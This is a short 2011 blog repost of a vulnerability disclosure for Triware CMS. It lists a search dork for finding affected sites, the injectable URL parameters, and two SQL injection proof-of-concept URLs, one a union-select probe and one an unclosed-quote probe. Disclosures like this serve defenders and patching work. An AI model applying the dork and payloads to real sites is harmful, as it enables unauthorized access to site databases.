Triware CMS Vulnerable to Multiple SQL Injection ~ Random stuff by yappare

Tuesday, March 15, 2011

Triware CMS Vulnerable to Multiple SQL Injection

on March 15, 2011 No comments

Title : Triware CMS Vulnerable to Multiple SQL Injection
Vendor : http://www.triware.ca/
Found by : p0pc0rn
Dork : intext:"Site by Triware Technologies Inc"

SQL - Jet Engine Database Error
-------------------------------
Parameter
http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id]
http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]

SQL - Unclosed Quotation Mark
-----------------------------
http://www.site.com/default.aspx?Content=[SQL]

POC
---
http://site.com/default.asp?com=Pages&id=1&m=1 union select 0 from test.a
http://www.site.com/default.aspx?Content=Place'

thanks,
-p0pc0rn-

Random stuff by yappare

Tuesday, March 15, 2011

Triware CMS Vulnerable to Multiple SQL Injection

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories